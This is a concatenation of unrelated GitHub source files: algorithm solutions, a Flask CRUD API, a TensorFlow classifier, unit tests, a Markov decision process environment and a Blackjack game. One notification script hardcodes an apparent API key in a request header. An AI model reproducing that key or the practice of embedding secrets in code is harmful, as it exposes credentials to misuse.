crnt_nrn[\"meta\"][\"vector_2\"][\"x\"] - crnt_nrn[\"meta\"][\"vector_1\"][\"x\"] ) / 2\n output[\"length_c\"] = np.round((self.calc_dist(output[\"local_tip_1\"],neuron[\"meta\"][\"real_center\"])+self.calc_dist(output[\"local_tip_2\"],neuron[\"meta\"][\"real_center\"])))\n return output\n\n \n def calc_vector_length(self,vector):\n X_D = pow(vector[\"x\"] ,2)\n Y_D = pow(vector[\"y\"], 2)\n return pow(X_D+Y_D,0.5)\n\n\n def get_vector_scalar(self,vector_1, vector_2):\n l1 = self.calc_vector_length(vector_1)\n l2 = self.calc_vector_length(vector_2)\n return l1 * l2 * np.cos(self.calc_angle(vector_1,vector_2))\n\n\n def remove_nrn_pos(self, position, neurons_pool=-1):\n lbl_General_Pool = False\n if neurons_pool==-1:\n lbl_General_Pool = True\n neurons_pool = self.lst_nrns\n nrn_id = neurons_pool[position].neuron[\"_id\"]\n layer_id = neurons_pool[position].neuron[\"layer_id\"]\n\n neurons_pool.pop(position)\n if lbl_General_Pool:\n self.nb_nrns = len(self.lst_nrns)\n self.netGraph.remove_node(nrn_id)\n self.layer_graph[layer_id-1].remove_node(nrn_id)\n return self.nb_nrns - 1\n\n\n def remove_nrn_by_id(self, nrn_id, neurons_pool=-1):\n lbl_General_Pool = False\n if neurons_pool==-1:\n lbl_General_Pool = True\n neurons_pool = self.lst_nrns\n for nrn_pos in range(len(neurons_pool)):\n if neurons_pool[nrn_pos].neuron[\"_id\"]==nrn_id:\n if nrn_id==128:\n print(nrn_id,len(neurons_pool))\n if lbl_General_Pool:\n return self.remove_nrn_pos(nrn_pos, -1)\n return self.remove_nrn_pos(nrn_pos, neurons_pool)\n return False\n\n ","repo_name":"oliviermanette/Sentive-One-Shot-Learning-Omniglot","sub_path":"metadl/starting_kit/model_dir/code_dir/sentive/sentive_neuron_helper.py","file_name":"sentive_neuron_helper.py","file_ext":"py","file_size_in_byte":25088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31934311356","text":"# Given two integers representing the numerator and denominator of a fraction, return the fraction in string format.\n# If the fractional part is repeating, enclose the repeating part in parentheses.\n# If multiple answers are possible, return any of them.\n# It is guaranteed that the length of the answer string is less than 104 for all the given inputs.\n#\n# Example 1:\n#\n# Input: numerator = 1, denominator = 2\n# Output: \"0.5\"\n#\n# Example 2:\n#\n# Input: numerator = 2, denominator = 1\n# Output: \"2\"\n#\n# Example 3:\n#\n# Input: numerator = 4, denominator = 333\n# Output: \"0.(012)\"\n#\n# Constraints:\n#\n# -2^31 <= numerator, denominator <= 2^31 - 1\n# denominator != 0\n\n\n# e.g. numerator = 4, denominator = 333\n# dic {}\n# n 4\n# dic {4: 2}\n# n 40\n# dic {4: 2, 40: 3}\n# n 67\n# dic {4: 2, 40: 3, 67: 4}\n# n 4\nclass Solution:\n def fractionToDecimal(self, numerator: int, denominator: int) -> str:\n if numerator == 0:\n return \"0\"\n\n s = \"\"\n if (numerator < 0) ^ (denominator < 0):\n s += \"-\"\n\n n, d = abs(numerator), abs(denominator)\n\n s += str(n // d)\n n %= d\n\n if n == 0:\n return s\n\n s += \".\"\n\n dic = {}\n while n != 0:\n if n in dic:\n i = dic[n] # repeat starting index\n s = s[:i] + \"(\" + s[i:] + \")\"\n break\n\n dic[n] = len(s)\n\n n *= 10\n s += str(n // d)\n n %= d\n\n return s\n","repo_name":"hongbo-miao/leetcode","sub_path":"Python/0166. Fraction to Recurring Decimal.py","file_name":"0166. Fraction to Recurring Decimal.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":197,"dataset":"github-code","pt":"3"} +{"seq_id":"12660133176","text":"from flask import redirect, request, jsonify, Response\nfrom pycrud import app , db\nfrom pycrud.models.country import Country , CountrySchema\n\n#Json Schemas\ncountry_schema = CountrySchema(strict=True)\ncountries_schema = CountrySchema(many=True,strict=True)\n\nroute = \"/country\"\n\n@app.route(route, methods=['POST'])\ndef create_country():\n country_fields = ('name', 'status')\n if country_fields == tuple(request.json.keys()):\n return Response(\"list of fields sent are not compatible with the model's fields\", status=400,mimetype=\"text/plain\")\n\n name = request.json[country_fields[0]]\n status = request.json[country_fields[1]]\n\n new_country = Country(name, status)\n db.session.add(new_country)\n db.session.commit()\n\n return country_schema.jsonify(new_country)\n\n@app.route(route, methods=['GET'])\ndef get_products():\n all_countries = Country.query.all()\n all_countries = filter(lambda prod: prod.status == True, all_countries)\n result = countries_schema.dump(all_countries)\n return jsonify(result.data)\n\n@app.route('%s/\n 投票地址:\n
\n 质押数量:5,530,000\n
\n 到期时间:2022-7-31\n
\n 剩余时间:11天\n'''\nurl = \"http://tool-robot.kumex.com:443/notify/encrypt_teams\"\nheaders = {\"XAK\": \"Rzsr5hTGpgrtbqcUMoFKhbDJZixEsPQ3AQ\", \"Content-Type\": \"application/json\"}\nsource = {\"cid\": \"19:68c7a4e9fccc4d23b00a3b7a5645685f@thread.v2\", \"content\": content}\nbstr = json.dumps(source).encode(\"utf-8\")\ndata = base64.encodebytes(bstr).decode(\"utf-8\")\nret = requests.post(url=url, headers=headers, data=data)\nprint(ret)","repo_name":"WDD-W/winnie-wwa","sub_path":"test/avax-endtime.py","file_name":"avax-endtime.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"2010412343","text":"import numpy as np\nimport pandas as pd\nimport sklearn \nimport tensorflow as tf\nfrom tensorflow.estimator import LinearClassifier\nfrom pandas.api.types import CategoricalDtype\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score\nfrom sklearn.model_selection import train_test_split\n\n\n\ncols = ['age', 'workclass', 'fnlwgt', 'education', 'education-num', 'marital-status', 'occupation', 'relationship', 'race', 'sex', 'capital-gain', 'capital-loss', 'hours-per-week', 'native-country', 'income']\ndf = pd.read_csv('income_evaluation.csv', header = 1, names = cols)\n#Change values into negative and positive class\ndf['income'].replace({' <=50K':0, ' >50K':1}, inplace=True)\ndf_obj = df.select_dtypes(include=['object'])\ndf_int = df.select_dtypes(include=['int64'])\n\ndef fit(X, y=None):\n categories = dict()\n df_num = X.select_dtypes(include=['object'])\n for column in df_num.columns:\n categories[column] = df_num[column].value_counts().index.tolist()\n return categories\n\n\ndef transform(X):\n X_copy = X.copy()\n categories = fit(X)\n X_copy = X_copy.select_dtypes(include=['object'])\n for column in X_copy.columns:\n X_copy[column] = X_copy[column].astype({column: CategoricalDtype(categories[column])})\n return pd.get_dummies(X_copy, drop_first=True)\n\nall_text = transform(df_obj)\n\nall_data = df_int.merge(all_text, left_index = True, right_index = True)\n\n\n# Feature Matrix \nX = all_data.drop('income', axis =1)\n# Data labels \ny = all_data['income']\n\nX_train, X_test, y_train, y_test = train_test_split(X , y , test_size=0.2)\n\n#Input pipeline\ndef input_pipeline(features_df, target_df, num_of_epochs=2, shuffle=True, batch_size = 20):\n def input_function():\n dataset = tf.data.Dataset.from_tensor_slices((dict(features_df), target_df))\n if shuffle:\n dataset = dataset.shuffle(1000)\n dataset = dataset.batch(batch_size).repeat(num_of_epochs)\n return dataset\n return input_function\n\ntrain_input = input_pipeline(X_train, y_train)\ntrain_input_testing = input_pipeline(X_train, y_train, num_of_epochs=1, shuffle=False)\ntest_input = input_pipeline(X_test,y_test, num_of_epochs=1, shuffle=False)\n\n#Model training\nfeature_columns_numeric = [tf.feature_column.numeric_column(m) for m in X_train.columns]\nlogistic_model = LinearClassifier(feature_columns=feature_columns_numeric)\nlogistic_model.train(train_input)\n\n#Predictions\ntrain_predictions = logistic_model.predict(train_input_testing)\ntest_predictions = logistic_model.predict(test_input)\ntrain_predictions_series = pd.Series([p['classes'][0].decode(\"utf-8\") for p in train_predictions])\ntest_predictions_series = pd.Series([p['classes'][0].decode(\"utf-8\") for p in test_predictions])\n\ntrain_predictions_df = pd.DataFrame(train_predictions_series, columns=['predictions'])\ntest_predictions_df = pd.DataFrame(test_predictions_series, columns=['predictions'])\n\ny_train.reset_index(drop=True, inplace=True)\n\n#Validation\ndef calculate_binary_class_scores(y_true, y_pred):\n accuracy = accuracy_score(y_true, y_pred.astype('int64'))\n precision = precision_score(y_true, y_pred.astype('int64'))\n recall = recall_score(y_true, y_pred.astype('int64'))\n return accuracy, precision, recall\n\ntrain_accuracy_score, train_precision_score, train_recall_score = calculate_binary_class_scores(y_train, train_predictions_series)\ntest_accuracy_score, test_precision_score, test_recall_score = calculate_binary_class_scores(y_test, test_predictions_series)\n\nprint('Training Data Accuracy (%) = ', round(train_accuracy_score*100,2))\nprint('Training Data Precision (%) = ', round(train_precision_score*100,2))\nprint('Training Data Recall (%) = ', round(train_recall_score*100,2))\n\nprint('#'*50)\n\nprint('Test Data Accuracy (%) = ', round(test_accuracy_score*100,2))\nprint('Test Data Precision (%) = ', round(test_precision_score*100,2))\nprint('Test Data Recall (%) = ', round(test_recall_score*100,2))\n\n\n","repo_name":"iwonajanny/classification","sub_path":"classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":3940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"32381607169","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n# __author__ = 'QiuZiXian' http://blog.csdn.net/qqzhuimengren/ 1467288927@qq.com\n# @time :2020/8/28 20:22\n# @abstract :\n\n\n# li = [1, 2, 3]\n#\n# print(li.insert(0, 1010))\n# print(li)\n# import nltk\n# nltk.download('wordnet')\nfrom nltk.corpus import wordnet as wn\n# dog_set = wn.synsets('dog')\n# print('dog的同义词集为:', dog_set)\n# print('dog的各同义词集包含的单词有:',[dog.lemma_names() for dog in dog_set])\n# print('dog的各同义词集的具体定义是:',[dog.definition() for dog in dog_set])\n# print('dog的各同义词集的例子是:',[dog.examples() for dog in dog_set])\n\n\ngoods = wn.synsets('心脏病')\nbeautifuls = wn.synsets('心脏疾病')\nbads = wn.synsets('bad')\ndogs = wn.synsets('dog')\ncats = wn.synsets('cat')\nprint('good和beautiful的语义相似度为: ', max([0 if good.path_similarity(beautiful) == None else good.path_similarity(beautiful) for good in goods for beautiful in beautifuls]))\nprint('good和bad的语义相似度为: ', max([0 if good.path_similarity(bad) == None else good.path_similarity(bad) for good in goods for bad in bads]))\nprint('dog和cat的语义相似度为: ', max([0 if dog.path_similarity(cat) == None else dog.path_similarity(cat) for dog in dogs for cat in cats]))\n\n","repo_name":"QiuZiXian/python-learning-process","sub_path":"extend_work/ner/modelfile/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"24672166618","text":"import hypothesis as hyp\nimport hypothesis.strategies as st\nimport numpy as np\nimport pytest\n\nfrom idesolver import IDEConvergenceWarning, IDESolver\n\n\ndef test_warning_when_not_enough_iterations():\n args = dict(\n x=np.linspace(0, 1, 100),\n y_0=0,\n c=lambda x, y: y - (0.5 * x) + (1 / (1 + x)) - np.log(1 + x),\n d=lambda x: 1 / (np.log(2)) ** 2,\n k=lambda x, s: x / (1 + s),\n lower_bound=lambda x: 0,\n upper_bound=lambda x: 1,\n f=lambda y: y,\n global_error_tolerance=1e-6,\n )\n\n good_solver = IDESolver(**args)\n good_solver.solve()\n\n bad_solver = IDESolver(**args, max_iterations=int(good_solver.iteration / 2))\n\n with pytest.warns(IDEConvergenceWarning):\n bad_solver.solve()\n\n\ndef test_y_intermediate_list_exists_if_store_intermediate_y_is_true():\n solver = IDESolver(\n x=np.linspace(0, 1, 100),\n y_0=0,\n c=lambda x, y: y - (0.5 * x) + (1 / (1 + x)) - np.log(1 + x),\n d=lambda x: 1 / (np.log(2)) ** 2,\n k=lambda x, s: x / (1 + s),\n lower_bound=lambda x: 0,\n upper_bound=lambda x: 1,\n f=lambda y: y,\n global_error_tolerance=1e-6,\n store_intermediate_y=True,\n )\n\n assert hasattr(solver, \"y_intermediate\")\n\n\ndef test_number_of_intermediate_solutions_is_same_as_iteration_count_plus_one():\n solver = IDESolver(\n x=np.linspace(0, 1, 100),\n y_0=0,\n c=lambda x, y: y - (0.5 * x) + (1 / (1 + x)) - np.log(1 + x),\n d=lambda x: 1 / (np.log(2)) ** 2,\n k=lambda x, s: x / (1 + s),\n lower_bound=lambda x: 0,\n upper_bound=lambda x: 1,\n f=lambda y: y,\n global_error_tolerance=1e-6,\n store_intermediate_y=True,\n )\n solver.solve()\n\n # the +1 is for the initial value, which isn't counted as an iteration, but is counted as a y_intermediate\n assert len(solver.y_intermediate) == solver.iteration + 1\n\n\ndef test_intermediate_solutions_of_scalar_problem_is_list_of_scalar_arrays():\n solver = IDESolver(\n x=np.linspace(0, 1, 100),\n y_0=0,\n c=lambda x, y: y - (0.5 * x) + (1 / (1 + x)) - np.log(1 + x),\n d=lambda x: 1 / (np.log(2)) ** 2,\n k=lambda x, s: x / (1 + s),\n lower_bound=lambda x: 0,\n upper_bound=lambda x: 1,\n f=lambda y: y,\n global_error_tolerance=1e-6,\n store_intermediate_y=True,\n )\n solver.solve()\n\n assert np.all([y.ndim == 1 for y in solver.y_intermediate])\n\n\ndef test_intermediate_solutions_of_vector_problem_is_list_of_vector_arrays():\n solver = IDESolver(\n x=np.linspace(0, 1, 100),\n y_0=[0, 1, 0],\n c=lambda x, y: [y[0] - (0.5 * x) + (1 / (1 + x)) - np.log(1 + x), y[0], 1],\n d=lambda x: [1 / (np.log(2)) ** 2, 0, 0],\n k=lambda x, s: x / (1 + s),\n lower_bound=lambda x: 0,\n upper_bound=lambda x: 1,\n f=lambda y: y,\n global_error_tolerance=1e-6,\n store_intermediate_y=True,\n )\n solver.solve()\n\n assert np.all([y.shape == (3, 100) for y in solver.y_intermediate])\n\n\ndef test_callback_is_called_correct_number_of_times(mocker):\n callback = mocker.Mock()\n\n solver = IDESolver(\n x=np.linspace(0, 1, 100),\n y_0=0,\n c=lambda x, y: y - (0.5 * x) + (1 / (1 + x)) - np.log(1 + x),\n d=lambda x: 1 / (np.log(2)) ** 2,\n k=lambda x, s: x / (1 + s),\n lower_bound=lambda x: 0,\n upper_bound=lambda x: 1,\n f=lambda y: y,\n global_error_tolerance=1e-6,\n store_intermediate_y=True,\n )\n solver.solve(callback=callback)\n\n # first iteration is number 0, so add one to left to get total number of callback calls\n assert callback.call_count == solver.iteration + 1\n\n\n@pytest.fixture(scope=\"module\")\ndef default_solver():\n return IDESolver(x=np.linspace(0, 1, 100), y_0=0)\n\n\n@hyp.given(x=st.complex_numbers(), y=st.complex_numbers())\ndef test_default_c(default_solver, x, y):\n assert default_solver.c(x, y) == 0\n\n\n@hyp.given(x=st.complex_numbers())\ndef test_default_d(default_solver, x):\n assert default_solver.d(x) == 1\n\n\n@hyp.given(x=st.complex_numbers(), s=st.complex_numbers())\ndef test_default_k(default_solver, x, s):\n assert default_solver.k(x, s) == 1\n\n\n@hyp.given(y=st.complex_numbers())\ndef test_default_f(default_solver, y):\n assert default_solver.f(y) == 0\n\n\ndef test_default_lower_bound(default_solver):\n assert default_solver.lower_bound(default_solver.x) == default_solver.x[0]\n\n\ndef test_default_upper_bound(default_solver):\n assert default_solver.upper_bound(default_solver.x) == default_solver.x[-1]\n","repo_name":"JoshKarpel/idesolver","sub_path":"tests/test_misc.py","file_name":"test_misc.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"22"} +{"seq_id":"74543652217","text":"from itertools import zip_longest\n\n\nclass Solution:\n def reformat(self, s: str) -> str:\n if len(s) > 1 and (s.isalpha() or s.isdigit()):\n return \"\"\n letters = \"\"\n numbers = \"\"\n for character in s:\n if character.isdigit():\n numbers += character\n else:\n letters += character\n\n if len(numbers) >= len(letters):\n sequence = zip_longest(numbers, letters)\n else:\n sequence = zip_longest(letters, numbers)\n\n return ''.join(''.join(pair) if all(pair) else pair[0] for pair in sequence)\n","repo_name":"anton-dovnar/LeetCode","sub_path":"String/Easy/1417.py","file_name":"1417.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"14723823092","text":"# 83.87875270843506s\r\nmax_step = 0\r\nmax_index = 0\r\nfor i in range(1, 10 ** 6 + 1):\r\n step = 0\r\n num = i\r\n while not num == 1:\r\n step += 1\r\n if num % 2 == 0:\r\n num //= 2\r\n else:\r\n num = 3 * num + 1\r\n if step > max_step:\r\n max_step = step\r\n max_index = i\r\nprint(max_index)\r\n\r\n\r\n# others1: 3.113677740097046s\r\ndef collatz(n): return n // 2 if n % 2 == 0 else 3 * n + 1\r\n\r\n\r\ndef distance(n, cache={1: 1}):\r\n if n not in cache: cache[n] = distance(collatz(n)) + 1\r\n return cache[n]\r\n\r\n\r\nprint(max(range(1, 1000000), key=distance))\r\n\r\n\r\n# others2: 3.403927803039551s\r\ndef longest_collatz_sequence(t):\r\n cache = {1: 1}\r\n\r\n def collatz_(n):\r\n if n not in cache:\r\n cache[n] = collatz_(3 * n + 1 if n % 2 else n / 2) + 1\r\n return cache[n] # Length of Collatz Chain\r\n\r\n return max(range(1, t), key=collatz_) # Greatest Chain\r\n\r\n\r\nprint(longest_collatz_sequence(1000000))\r\n","repo_name":"kaki1013/project_euler","sub_path":"solution14_개선.py","file_name":"solution14_개선.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"70203650296","text":"load(\"//sqlc/private/rules:release.bzl\", _sqlc_release = \"sqlc_release\")\nload(\"//sqlc/private/rules:package.bzl\", _sqlc_package = \"sqlc_package\")\nload(\n \"//sqlc/private:sqlc_toolchain.bzl\",\n _declare_toolchains = \"declare_toolchains\",\n _sqlc_toolchain = \"sqlc_toolchain\",\n)\nload(\n \"//sqlc/private:providers.bzl\",\n _SQLCRelease = \"SQLCRelease\",\n)\n\nSQLCRelease = _SQLCRelease\n\ndeclare_toolchains = _declare_toolchains\nsqlc_release = _sqlc_release\nsqlc_package = _sqlc_package\nsqlc_toolchain = _sqlc_toolchain\n","repo_name":"plezentek/rules_sqlc","sub_path":"sqlc/def.bzl","file_name":"def.bzl","file_ext":"bzl","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"22"} +{"seq_id":"6772363320","text":"\"\"\"\nThis module implements the MDP class, a Gym environment\nthat models a Markovian Decision Process.\n\"\"\"\n\nimport sys\nimport multiprocessing as mp\nfrom functools import partial\nimport numpy as np\nimport gymnasium as gym\nfrom gymnasium import spaces\nfrom tqdm import tqdm\n\n\nclass MDP(gym.Env):\n \"\"\"\n Class to implement a stationary Markov Decision Process\n as a gym environment.\n \"\"\"\n\n def __init__(\n self,\n num_actions: int,\n num_states: int,\n rewards: dict[(int, int):float], # r(s,a) \\in R\n transitions: dict[(int, int):int], # (s,a) ~> s'\n init_state: int, # initial state\n beta: float, # discount factor\n f: list[tuple[int]], # strategy used by controller\n timesteps: int = 100,\n ):\n \"\"\"\n Initialising the MDP with `num_states` states and\n `num_actions` actions using spaces.Discrete.\n Note: Both spaces are zero-indexed !!!\n \"\"\"\n # counters for determining end of run\n self.timesteps, self.curr_time = timesteps, 0\n\n # main variables\n self.observation_space = spaces.Discrete(num_states)\n self.action_space = spaces.Discrete(num_actions)\n self.rewards = rewards\n self.transitions = transitions\n self.curr_reward = 0.0\n self.f = f\n self.beta = beta\n\n if self.rewards.keys() != self.transitions.keys():\n raise RuntimeError(\"Rewards and Transitions defined on different domains\")\n if init_state < 0 or init_state >= num_states:\n raise RuntimeError(f\"Invalid init state{init_state}: out of bounds!\")\n\n # storing state-related variables\n self.init_state = init_state # storing this for reset()\n self.curr_state = init_state\n\n # calculate the transition matrix\n # using the strategy and the transition probas\n # self._calculate_P()\n\n def reset(self, seed=None, options=None):\n \"\"\"\n Reset the MDP to run the next trajectory\n \"\"\"\n super().reset(seed=seed)\n self.curr_reward = 0.0\n self.curr_state = self.init_state\n self.old_state = None\n self.curr_time = 0\n\n def step(self, action: int):\n \"\"\"\n Simulate a step in an MDP. This means an action is taken,\n so that s ---> s',\n \"\"\"\n try:\n self.transitions[(self.curr_state, action)]\n except KeyError:\n # Using info parameter to return status\n return (\n self.curr_state,\n self.curr_reward,\n self.curr_time == self.timesteps,\n \"Invalid state accessed. Not stepping.\",\n )\n # state with defined transitions, stepping.\n probas = self.transitions[(self.curr_state, action)]\n self.curr_reward += self._get_reward(action)\n self.curr_state = self._get_state(\n probas\n ) # old_state <- curr_state, curr_state <- new_state\n self.curr_time += 1\n # returning results of step\n return self.curr_state, self.curr_reward, self.curr_time == self.timesteps, None\n\n def _calculate_P(self):\n \"\"\"\n Helper function to calculate the transition matrix P\n as defined by the Markov Decision Process. This relies on\n the object being well-initialised first.\n \"\"\"\n raise RuntimeError(\"_calculate_P should not be explicit.\")\n self.P = np.zeros((self.observation_space.n, self.observation_space.n))\n for i in range(self.observation_space.n):\n local_f = self.f[i]\n for j in range(self.observation_space.n):\n for k in range(len(local_f)):\n # this length is similar to number\n # of actions for this state.\n self.P[i, j] += local_f[k] * self.transitions[(i, k)][j]\n\n def _get_state(self, probas):\n \"\"\"\n Helper function to return the current state,\n using the probability distribution over each\n state in self.observation_space\n \"\"\"\n # Create a mask that is 1 only where we select the element.\n # this mask has to be generated using transition probability\n # as defined in `probas`.\n mask = np.zeros(self.observation_space.n, dtype=np.int8)\n mask[np.random.choice(range(self.observation_space.n), p=probas)] = 1\n\n # Saving current state and selecting new state using observation space\n self.old_state = self.curr_state\n return self.observation_space.sample(mask=mask)\n\n def _get_reward(self, action):\n \"\"\"\n Helper function to calculate the reward for each\n timestep, using the old state and the action.\n \"\"\"\n try:\n return self.rewards[(self.curr_state, action)] * (\n self.beta**self.curr_time\n )\n except KeyError:\n # When accessing undefined states.\n return 0.0\n\n def sample(self):\n \"\"\"\n Samples an action from the action space\n according to probabilities defined by the\n strategy and current state\n \"\"\"\n # using a mask that is 1 only for the action\n # chosen using the probas chosen using the strategy.\n action_probas = self.f[self.curr_state]\n if len(action_probas) != self.action_space.n:\n # Undefined states : pad action_probas\n # on the right to the same length\n action_probas = np.pad(\n action_probas, (0, self.action_space.n - len(action_probas))\n )\n mask = np.zeros(self.action_space.n, dtype=np.int8)\n mask[np.random.choice(range(self.action_space.n), p=action_probas)] = 1\n return self.action_space.sample(mask=mask)\n\n\ndef create_mdp_and_run_epoch(init_state: int = 0, args=None):\n \"\"\"\n Function to create an MDP and run an epoch, to get the average reward.\n Parameters are hardcoded for now.\n \"\"\"\n # simulating the text example.\n mdp_states, mdp_actions = 3, 2\n\n # rewards are represented as (curr_state,action)->reward key-value pairs\n mdp_rewards = {(0, 0): -5, (0, 1): 10, (1, 0): 5, (1, 1): 0, (2, 0): 20}\n\n # transition probabilities are represented as a dict of\n # (curr_state, action)-> proba_of_state[idx] key-value pairs\n mdp_transitions = {\n (0, 0): [0.9, 0, 0.1],\n (0, 1): [0, 1, 0],\n (1, 0): [0, 1, 0],\n (1, 1): (0.8, 0.2, 0),\n (2, 0): [0.9, 0.1, 0],\n }\n\n # Strategy used by the MDP\n # strat[state] = list[proba_of_choosing_action: float]\n # Note: here, state 3 only defines action 1, so it is\n # a singleton.\n mdp_strategy = [(0.1, 0.9), (1.0, 0.0), (1.0,)]\n\n # just checking\n assert mdp_transitions.keys() == mdp_rewards.keys()\n\n mdp = MDP(\n mdp_actions,\n mdp_states,\n mdp_rewards,\n mdp_transitions,\n init_state=init_state,\n beta=0.8,\n f=mdp_strategy,\n timesteps=1000,\n )\n\n done = False\n while not done:\n curr_action = mdp.sample()\n _, reward, done, _ = mdp.step(curr_action)\n mdp.reset()\n\n # return the result of the trajectory\n return reward\n\n\nif __name__ == \"__main__\":\n # choose the initial state using a partial function\n INIT_STATE = int(sys.argv[1]) if len(sys.argv) > 1 else 0\n worker = partial(create_mdp_and_run_epoch, INIT_STATE)\n print(f\"Setting initial state to {INIT_STATE}\")\n\n # define the parameters of the run\n num_epochs, record_list = 100, []\n\n # running it in parallel for speed\n with mp.Pool() as pool:\n for result in tqdm(\n pool.imap_unordered(worker, range(num_epochs)), total=num_epochs\n ):\n record_list.append(result)\n\n # checking that we did not lose any results\n assert len(record_list) == num_epochs\n\n # results\n print(\n f\"Average reward over {num_epochs} runs = {sum(record_list) / len(record_list)}\"\n )\n","repo_name":"PrasannaMaddila/markov-decision-processes","sub_path":"src/mdp.py","file_name":"mdp.py","file_ext":"py","file_size_in_byte":7980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"30099125856","text":"class Solution(object):\n def nextGreatestLetter(self, letters, target):\n \"\"\"\n :type letters: List[str]\n :type target: str\n :rtype: str\n \"\"\"\n if target >= letters[-1]:\n return letters[0]\n elif target < letters[0]:\n return letters[0]\n else:\n return self.divfind(target, letters)\n\n def divfind(self, target, letters):\n print(target, letters)\n if len(letters) == 1 and letters[0] >= target:\n return letters[0]\n if len(letters) == 2 and letters[0] > target and letters[0] <= letters[1]:\n return letters[0]\n elif len(letters) == 2:\n return letters[1]\n\n length = len(letters)\n if letters[int(length / 2)] > target:\n return self.divfind(target, letters[:int(length / 2) + 1])\n else:\n return self.divfind(target, letters[int(length / 2) + 1:])\n\n\n\n\n\n\nsol = Solution()\nletter = sol.nextGreatestLetter([\"c\",\"f\",\"j\"],\n\"c\")\n\n\n\nprint(letter)","repo_name":"stubird/micStudy","sub_path":"leetcode/nextGreatestLetter.py","file_name":"nextGreatestLetter.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"33169101984","text":"from ast import Return\nfrom random import random\nfrom secrets import randbelow\n\n\nimport random\nfrom telnetlib import PRAGMA_HEARTBEAT\ndef luo_korttipakka():\n pakka = []\n for x in [\"Pata\", \"Hertta\", \"Ruutu\", \"Risti\"]:\n for i in range (13):\n pakka.append (x + \" \" + str(i + 1))\n return pakka\n\ndef laske_arvo (kortit) :\n arvo = 0\n for k in kortit:\n if int(k.split () [1] ) > 10:\n arvo = arvo + 10\n else:\n arvo = arvo + int(k.split()[1])\n return arvo\n\nwhile (input (\"Pelataanko {K/E]? \") .upper() == \"K\") :\n pakka = luo_korttipakka()\n random.shuffle(pakka)\n\n pelaaja = [pakka]\n jakaja = []\n for i in range(2):\n pelaaja.append(pakka.pop())\n jakaja.append(pakka.pop())\n\n while True:\n pelaaja_pisteet = laske_arvo(pelaaja)\n print (\"PELAAJAN VUORO:\")\n print(\"Pelaaja:\", pelaaja_pisteet, \": \", pelaaja)\n print (\"Jakaja:\", jakaja [0])\n if pelaaja_pisteet >=21:\n break\n if input(\"Ota kortti [K]? \").upper() == \"K\":\n pelaaja.append(pakka.pop())\n else:\n break\n if pelaaja_pisteet >21:\n print (\"YLI 21: PEALAAJA HÄVISI!`\\n\")\n continue\n elif pelaaja_pisteet ==21:\n print (\"BLACKJACK!: PELAAJA VOITTI!\\n!\")\n continue\n while True:\n jakaja_pisteet = laske_arvo(jakaja)\n print (\"JAKAJAN VUORO:\")\n print (\"Pelaaja:\", pelaaja_pisteet,\": \", pelaaja)\n print (\"Jakaja: \", jakaja_pisteet, \", \", jakaja)\n if jakaja_pisteet < 16:\n jakaja.append(pakka.pop())\n else:\n break\n if jakaja_pisteet > 21 or jakaja_pisteet < pelaaja_pisteet:\n print (\"PELAAJA VOITTI!\\n\")\n \n else:\n print (\"PELAAJA HÄVISI!\\n\")\n\n","repo_name":"Doomriver/BlackJackGame","sub_path":"BlackJackGame.py","file_name":"BlackJackGame.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"35993964955","text":"# -*- coding: iso-8859-15 -*-\nimport kafe\nfrom kafe.function_tools import FitFunction, LaTeX, ASCII\nfrom numpy import exp, sqrt, pi\nfrom scipy.special import gamma, wofz\n##################################\n# Definition of the fit function #\n##################################\n# Set an ASCII expression for this function\n@ASCII(x_name=\"t\", expression=\"A0*exp(-t/tau)\")\n# Set some LaTeX-related parameters for this function\n@LaTeX(name='A', x_name=\"t\",\n parameter_names=('A_0', '\\\\tau{}'),\n expression=\"A_0\\\\,\\\\exp(\\\\frac{-t}{\\\\tau})\")\n@FitFunction\ndef exponential(t, A0=1, tau=1):\n return A0 * exp(-t/tau)\n\n\n# Initialize the Dataset and load data from a file\nmy_dataset = kafe.Dataset(title=\"Example dataset\",\n axis_labels=['t', 'A'])\nmy_dataset.read_from_file(input_file='dataset.dat')\n\n# Perform a Fit\nmy_fit = Fit(my_dataset, exponential)\nmy_fit.do_fit()\n\n# Plot the results\nmy_plot = Plot(my_fit)\nmy_plot.plot_all()\n\n\n# Create plots of the contours and profile chi-squared\ncontour = my_fit.plot_contour(0, 1, dchi2=[1.0, 2.3])\nprofile1 = my_fit.plot_profile(0)\nprofile2 = my_fit.plot_profile(1)\n\n# Show the plots\nmy_plot.show()\n","repo_name":"niklasries/PraktikumPhysik-KIT","sub_path":"Data/shitprogramm.py","file_name":"shitprogramm.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26200161851","text":"import string\n\nregs = {}\nfor i in range(0, 26):\n regs[string.ascii_lowercase[i]] = 0\n\nlast_played = 0\n\ndef parse_instr(instr):\n global last_played\n offset = 1\n operand = instr.split(' ')\n print(instr)\n if operand[0] == 'snd':\n if operand[1] >= 'a':\n last_played = regs[operand[1]]\n 